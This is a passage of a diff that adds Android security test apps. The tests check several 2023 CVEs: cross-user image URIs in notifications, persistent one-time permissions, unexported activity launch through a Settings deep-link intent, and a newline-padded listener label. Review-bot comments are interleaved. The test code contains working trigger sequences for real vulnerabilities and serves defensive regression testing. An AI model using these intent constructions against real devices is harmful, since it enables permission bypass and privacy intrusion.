+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21244;
+
+import static android.app.NotificationManager.IMPORTANCE_DEFAULT;
+import static android.provider.MediaStore.Images.Media.EXTERNAL_CONTENT_URI;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.RemoteInputHistoryItem;
+import android.content.ContentProvider;
+import android.content.Context;
+import android.content.pm.UserInfo;
+import android.graphics.drawable.Icon;
+import android.os.UserManager;
+import android.service.notification.StatusBarNotification;
+import android.util.Log;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.compatibility.common.util.SystemUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.io.IOException;
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ private static final String TAG = "CVE-2023-21244";
+
+ @Test
+ public void testCVE_2023_21244() {
+ try {
+ // Get the user id of "cve_2023_21244_user" created in testPocCVE_2023_21244()
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = instrumentation.getContext();
+ int testUserId =
+ SystemUtil.runWithShellPermissionIdentity(
+ () -> {
+ UserManager userManager =
+ context.getSystemService(UserManager.class);
+ List<UserInfo> users = userManager.getUsers();
+ int userId = -1;
+ for (UserInfo user : users) {
+ if (user.name.equals("cve_2023_21244_user")) {
+ userId = user.id;
+ break;
+ }
+ }
+ return userId;
+ },
+ android.Manifest.permission.CREATE_USERS);
+ assumeTrue("Unable to find the user cve_2023_21244_user", testUserId != -1);
+
+ // Insert a placeholder content in the new user and query it to see if it has been
+ // inserted successfully
+ final String imagesContentUri = EXTERNAL_CONTENT_URI.toString();
+ assumeTrue(
+ "Failed to insert a placeholder content in the test user",
+ poll(
+ () -> {
+ try {
+ SystemUtil.runShellCommand(
+ instrumentation,
+ String.format(
+ "content insert --user %d --uri %s --bind "
+ + "_display_name:s:cve_2023_21244.jpg",
+ testUserId, imagesContentUri));
+ return SystemUtil.runShellCommand(
+ instrumentation,
+ String.format(
+ "content query " + "--user %d --uri %s",
+ testUserId, imagesContentUri))
+ .contains("Row");
+ } catch (IOException e) {
+ Log.i(TAG, "Got an exception: " + e);
+ }
+ return false;
+ }));
+
+ // Prepare the notification builder with the remote input history containing the
+ // secondary user's image
+ final String channelId = "CVE_2023_20913_channel";
+ Notification.Builder builder =
+ new Notification.Builder(context, channelId)
+ .setChannelId(channelId)
+ .setSmallIcon(
+ Icon.createWithData(
+ new byte[0] /* data */,
+ 0 /* offset */,
+ 0 /* length */));
+ RemoteInputHistoryItem remoteInputHistoryItems[] = {
+ new RemoteInputHistoryItem(
+ "image/*" /* mime type */,
+ ContentProvider.maybeAddUserId(EXTERNAL_CONTENT_URI, testUserId),
+ "cve_2023_21244_text" /* backup text */)
+ };
+ builder.setRemoteInputHistory(remoteInputHistoryItems);
+
+ // Send the notification
+ final int notificationId = 1;
+ NotificationManager nmgr = context.getSystemService(NotificationManager.class);
+ nmgr.createNotificationChannel(
+ new NotificationChannel(channelId, channelId, IMPORTANCE_DEFAULT));
+ try {
+ nmgr.notify(notificationId, builder.build());
+ } catch (SecurityException securityException) {
+ if (securityException
+ .getLocalizedMessage()
+ .toLowerCase()
+ .contains(imagesContentUri)) {
+ // Ignore as this is expected with fix and the test should pass so exit the test
+ return;
+ } else {
+ throw securityException;
+ }
+ }
+
+ // Check if notification gets posted or not. On a vulnerable device, the notification
+ // containing other users' image will get posted, hence fail the test else the test will
+ // pass.
+ assertFalse(
+ "Device is vulnerable to b/276729064 hence images belonging to another user on"
+ + " the same device can be displayed in notification by setting it as"
+ + " a part of remote input history",
+ poll(
+ () -> {
+ StatusBarNotification[] activeNotifications =
+ nmgr.getActiveNotifications();
+ for (StatusBarNotification notification : activeNotifications) {
+ if (notification.getId() == notificationId
+ && notification
+ .getPackageName()
+ .equals(context.getPackageName())) {
+ return true;
+ }
+ }
+ return false;
+ }));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
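Review bot: The final `assertFalse(..., poll(...))` in `testCVE_2023_21244()` treats "the notification never appeared" as proof of the fix, but nothing earlier establishes that this app can post notifications at all. A device where posting is blocked for an unrelated reason would therefore pass; the manifest only declares POST_NOTIFICATIONS, and whether it is granted at install time is decided outside this hunk. A precondition before `nmgr.notify(...)`, such as `assumeTrue("Notifications are disabled for the test app", nmgr.areNotificationsEnabled());`, would turn that case into a skip instead of a pass. Separately, the channel id `"CVE_2023_20913_channel"` looks copied from a different test, and neither the posted notification nor the channel is removed when the test ends.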
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/Android.bp
new file mode 100644
index 0000000..e8ef246
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/Android.bp
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21254-helper",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "helper-app/src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ manifest: "helper-app/AndroidManifest.xml",
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21254-test",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "test-app/src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.uiautomator_uiautomator",
+ "compatibility-device-util-axt",
+ "sts-device-util",
+ ],
+ manifest: "test-app/AndroidManifest.xml",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/helper-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/helper-app/AndroidManifest.xml
new file mode 100644
index 0000000..8bbf9e8
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/helper-app/AndroidManifest.xml
@@ -0,0 +1,25 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21254_helper">
+ <uses-permission android:name="android.permission.RECORD_AUDIO" />
+ <application>
+ <activity android:name=".PocActivity"
+ android:exported="true" />
+ </application>
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/helper-app/src/android/security/cts/CVE_2023_21254_helper/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/helper-app/src/android/security/cts/CVE_2023_21254_helper/PocActivity.java
new file mode 100644
index 0000000..3d3b2f7
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/helper-app/src/android/security/cts/CVE_2023_21254_helper/PocActivity.java
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21254_helper;
+
+import static android.Manifest.permission.RECORD_AUDIO;
+import static android.app.ApplicationExitInfo.REASON_USER_REQUESTED;
+
+import android.app.Activity;
+import android.content.pm.PackageManager;
+
+public class PocActivity extends Activity {
+ private static final int REQUEST_CODE = 1;
+
+ @Override
+ protected void onResume() {
+ super.onResume();
+ if (checkSelfPermission(RECORD_AUDIO) != PackageManager.PERMISSION_GRANTED) {
+ requestPermissions(new String[] {RECORD_AUDIO}, REQUEST_CODE);
+ }
+ }
+
+ @Override
+ public void onRequestPermissionsResult(int requestCode, String[] permissions, int[] results) {
+ super.onRequestPermissionsResult(requestCode, permissions, results);
+ if (requestCode == REQUEST_CODE
+ && permissions[0].equals(RECORD_AUDIO)
+ && results[0] == PackageManager.PERMISSION_GRANTED) {
+ // Terminate app process if one-time permission is granted
+ System.exit(REASON_USER_REQUESTED);
+ }
+ }
+}
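Review bot: `onRequestPermissionsResult` reads `permissions[0]` and `results[0]` without checking the array lengths, and Android delivers empty arrays when a permission request is interrupted. The device test in this change notes that the grant dialog may be launched twice. In that case the helper would die with an ArrayIndexOutOfBoundsException instead of exiting with the marker status. Add `&& permissions.length > 0 && results.length > 0` directly after the `requestCode == REQUEST_CODE` check. A comment on `System.exit(REASON_USER_REQUESTED)` should also say that the constant is used only as an exit status code, which the test matches through `ApplicationExitInfo.getStatus()`, not as an exit reason.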
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/test-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/test-app/AndroidManifest.xml
new file mode 100644
index 0000000..d9d2502
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/test-app/AndroidManifest.xml
@@ -0,0 +1,23 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21254_test">
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21254_test" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/test-app/src/android/security/cts/CVE_2023_21254_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/test-app/src/android/security/cts/CVE_2023_21254_test/DeviceTest.java
new file mode 100644
index 0000000..c5db133
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/test-app/src/android/security/cts/CVE_2023_21254_test/DeviceTest.java
@@ -0,0 +1,154 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21254_test;
+
+import static android.Manifest.permission.DUMP;
+import static android.Manifest.permission.RECORD_AUDIO;
+import static android.app.ApplicationExitInfo.REASON_USER_REQUESTED;
+import static android.content.pm.PackageManager.PERMISSION_DENIED;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.compatibility.common.util.SystemUtil.runWithShellPermissionIdentity;
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import static java.lang.String.format;
+
+import android.app.ActivityManager;
+import android.app.ApplicationExitInfo;
+import android.app.Instrumentation;
+import android.app.UiAutomation;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.BySelector;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.List;
+import java.util.function.BooleanSupplier;
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testPocCVE_2023_21254() {
+ try {
+ final Instrumentation instrumentation = getInstrumentation();
+ final Context context = instrumentation.getContext();
+ final UiAutomation uiAutomation = instrumentation.getUiAutomation();
+ final String helperAppPkg = "android.security.cts.CVE_2023_21254_helper";
+
+ // Revoke RECORD_AUDIO permission for helperAppPkg
+ uiAutomation.revokeRuntimePermission(helperAppPkg, RECORD_AUDIO, context.getUser());
+
+ // Wait until RECORD_AUDIO permission is revoked for helperAppPkg
+ BooleanSupplier permissionCheck =
+ new BooleanSupplier() {
+ @Override
+ public boolean getAsBoolean() {
+ PackageManager pm = context.getPackageManager();
+ return pm.checkPermission(RECORD_AUDIO, helperAppPkg)
+ == PERMISSION_DENIED;
+ }
+ };
+ assumeTrue(
+ format(
+ "%s permission is not revoked for %s package hence skipping",
+ RECORD_AUDIO, helperAppPkg),
+ poll(permissionCheck));
+
+ // Start targetActivity from helper app which will request for one-time permission
+ final String targetActivity = "android.security.cts.CVE_2023_21254_helper.PocActivity";
+ Intent intent =
+ new Intent()
+ .setClassName(helperAppPkg, targetActivity)
+ .setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ context.startActivity(intent);
+
+ // Grant one-time permission to helperAppPkg. This has dependence on UI since permission
+ // required to grant one-time permission MANAGE_ONE_TIME_PERMISSION_SESSIONS cannot be
+ // granted to test-app or used via adoptShellPermissionIdentity
+ final UiDevice uiDevice = UiDevice.getInstance(instrumentation);
+ final long uiTimeoutMs = 2_000L;
+ BySelector selector =
+ By.res(createCaseInsensitivePattern(".*permission_allow_one_time_button.*"))
+ .pkg(createCaseInsensitivePattern(".*permissioncontroller.*"));
+ assumeTrue(
+ "UI element for allowing one-time permission not found",
+ uiDevice.wait(Until.hasObject(selector), uiTimeoutMs));
+ uiDevice.findObject(selector).click();
+ // If in case GrantPermissionsActivity is launched twice due to race condition, click UI
+ // element again to grant one-time permission
+ if (!uiDevice.wait(Until.gone(selector), uiTimeoutMs)) {
+ uiDevice.findObject(selector).click();
+ }
+
+ // Wait until helperAppPkg app process is terminated
+ runWithShellPermissionIdentity(
+ () -> {
+ assumeTrue(
+ format(
+ "%s app process not terminated and hence skipping",
+ helperAppPkg),
+ poll(
+ () -> {
+ // Pass pid and maxNum as 0 to
+ // getHistoricalProcessExitReasons() in
+ // order to get all matching records for helperAppPkg.
+ final List<ApplicationExitInfo> infos =
+ context.getSystemService(ActivityManager.class)
+ .getHistoricalProcessExitReasons(
+ helperAppPkg,
+ 0 /* pid */,
+ 0 /* maxNum */);
+ for (ApplicationExitInfo info : infos) {
+ if (info.getStatus() == REASON_USER_REQUESTED) {
+ return true;
+ }
+ }
+ return false;
+ }));
+ },
+ DUMP);
+
+ // Without fix, one-time permission for helperAppPkg is not revoked after app process
+ // terminates and hence test fails
+ assertTrue(
+ "Device is vulnerable to b/254736794!! One-time permissions can be held"
+ + " indefinitely due to activity manager bug",
+ poll(permissionCheck));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ private Pattern createCaseInsensitivePattern(String pattern) {
+ return Pattern.compile(pattern, Pattern.CASE_INSENSITIVE);
+ }
+}
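Review bot: The termination gate inside `runWithShellPermissionIdentity` accepts any historical exit record for `helperAppPkg` whose status equals `REASON_USER_REQUESTED`, because pid and maxNum are both 0. A record left by an earlier run could satisfy it before the helper has exited in this run. If exit records survive between runs (not visible here), the wait no longer shows that the process which just received the one-time grant has terminated. Recording `final long startMs = System.currentTimeMillis();` before `context.startActivity(intent)` and requiring `info.getTimestamp() >= startMs` in the loop would bind the check to this run. The comparison of `getStatus()` against a `REASON_*` constant also deserves a comment stating that the helper deliberately exits with that value as its status code.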
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/Android.bp
new file mode 100644
index 0000000..1f7e5c2
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21256",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "Nene",
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+ platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/AndroidManifest.xml
new file mode 100644
index 0000000..b6cdbca
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/AndroidManifest.xml
@@ -0,0 +1,22 @@
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21256">
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21256" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/src/android/security/cts/CVE_2023_21256/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/src/android/security/cts/CVE_2023_21256/DeviceTest.java
new file mode 100644
index 0000000..31d153f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/src/android/security/cts/CVE_2023_21256/DeviceTest.java
@@ -0,0 +1,134 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21256;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.UiAutomation;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.content.pm.ResolveInfo;
+import android.os.UserHandle;
+import android.provider.Settings;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.Until;
+
+import com.android.bedstead.nene.utils.Poll;
+import com.android.internal.app.PlatLogoActivity;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.time.Duration;
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ private UiDevice mUiDevice;
+
+ @Test
+ public void testSettingsHomePageActivityFromWorkProfile() {
+ UiAutomation uiAutomation = null;
+ try {
+ final long timeoutMs = 10_000L;
+ Instrumentation instrumentation = getInstrumentation();
+ uiAutomation = instrumentation.getUiAutomation();
+ mUiDevice = UiDevice.getInstance(instrumentation);
+ Context context = instrumentation.getContext();
+ String defaultSettingsPkg = "com.android.settings";
+ String platLogoActivityName = PlatLogoActivity.class.getName();
+ String dumpsysActivityCmd = "dumpsys activity " + platLogoActivityName;
+
+ // Retrieve Settings app's package name
+ uiAutomation.adoptShellPermissionIdentity(
+ android.Manifest.permission.INTERACT_ACROSS_USERS);
+ ResolveInfo info =
+ context.getPackageManager()
+ .resolveActivityAsUser(
+ new Intent(Settings.ACTION_SETTINGS),
+ PackageManager.MATCH_SYSTEM_ONLY,
+ UserHandle.USER_SYSTEM);
+ if (info != null && info.activityInfo != null) {
+ defaultSettingsPkg = info.activityInfo.packageName;
+ }
+
+ // Attempt to launch PlatLogoActivity using Settings app
+ Intent intent =
+ Intent.createChooser(
+ new Intent(Settings.ACTION_SETTINGS_EMBED_DEEP_LINK_ACTIVITY)
+ .setClassName(
+ defaultSettingsPkg,
+ defaultSettingsPkg
+ + ".homepage.SettingsHomepageActivity")
+ .putExtra(
+ Settings.EXTRA_SETTINGS_EMBEDDED_DEEP_LINK_INTENT_URI,
+ new Intent(Intent.ACTION_CHOOSER)
+ .toUri(Intent.URI_INTENT_SCHEME))
+ .putExtra(
+ Intent.EXTRA_INTENT,
+ new Intent()
+ .setClassName("android", platLogoActivityName))
+ .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK),
+ "chooserTitle");
+ context.startActivity(intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+ // Click Settings from ChooserActivity
+ String settingsText = "Settings";
+ assumeTrue(mUiDevice.wait(Until.hasObject(By.text(settingsText)), timeoutMs));
+ mUiDevice.findObject(By.text(settingsText)).click();
+
+ Pattern resumedTruePattern =
+ Pattern.compile(".*mResumed=true.*", Pattern.CASE_INSENSITIVE);
+
+ // Wait for dumpsys result to update
+ Poll.forValue(
+ () ->
+ resumedTruePattern
+ .matcher(mUiDevice.executeShellCommand(dumpsysActivityCmd))
+ .find())
+ .toBeEqualTo(true)
+ .timeout(Duration.ofMillis(timeoutMs))
+ .await();
+
+ // Fail test if PlatLogoActivity was launched
+ assertFalse(
+ "Device is vulnerable to b/250589026, Unexported activities can be launched"
+ + "using ACTION_SETTINGS_EMBED_DEEP_LINK_ACTIVITY from a workProfile",
+ resumedTruePattern
+ .matcher(mUiDevice.executeShellCommand(dumpsysActivityCmd))
+ .find());
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ uiAutomation.dropShellPermissionIdentity();
+ mUiDevice.pressHome();
+ } catch (Exception e) {
+ // Ignore exceptions as the test has finished
+ }
+ }
+ }
+}
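Review bot: The chooser step finds its target with the hard-coded English string `"Settings"`, so on a device with another locale or a renamed Settings app the `assumeTrue` fails and the test is skipped instead of exercising the launch path. Since `info` is already resolved for the Settings activity, the label could be derived from it, for example `String settingsText = info != null ? info.loadLabel(context.getPackageManager()).toString() : "Settings";`. Whether the chooser shows exactly that label would need confirming. The same `assumeTrue` has no message, and the assertion text joins `"can be launched"` and `"using ACTION_SETTINGS_EMBED_DEEP_LINK_ACTIVITY..."` without a space. In the `finally` block `uiAutomation` can still be null, and the swallowed NullPointerException then skips `mUiDevice.pressHome()`.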
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/Android.bp
new file mode 100644
index 0000000..454f3c5
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21260",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java"
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/AndroidManifest.xml
new file mode 100644
index 0000000..016907d
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/AndroidManifest.xml
@@ -0,0 +1,33 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21260">
+ <!-- Added '__' prefix to label to make the app appear at the top of list in settings -->
+ <application android:label="__CVE_2023_21260">
+ <service android:name=".TestListener"
+ android:label="\n\nCVE_2023_21260_TestListener_BugPresent"
+ android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.service.notification.NotificationListenerService" />
+ </intent-filter>
+ </service>
+ </application>
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21260" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/src/android/security/cts/CVE_2023_21260/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/src/android/security/cts/CVE_2023_21260/DeviceTest.java
new file mode 100644
index 0000000..6d7b97e
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/src/android/security/cts/CVE_2023_21260/DeviceTest.java
@@ -0,0 +1,88 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21260;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.content.Intent;
+import android.provider.Settings;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.BySelector;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testCVE_2023_21260() {
+ try {
+ final int waitMS = 5_000;
+ Instrumentation instrumentation = getInstrumentation();
+ UiDevice device = UiDevice.getInstance(instrumentation);
+
+ // Launch Notification listener settings
+ instrumentation
+ .getContext()
+ .startActivity(
+ new Intent(Settings.ACTION_NOTIFICATION_LISTENER_SETTINGS)
+ .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
+ .addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK));
+
+ // Click on '__CVE_2023_21260' to launch Notification access permission dialog box for
+ // the TestListener
+ Pattern testListenerPattern =
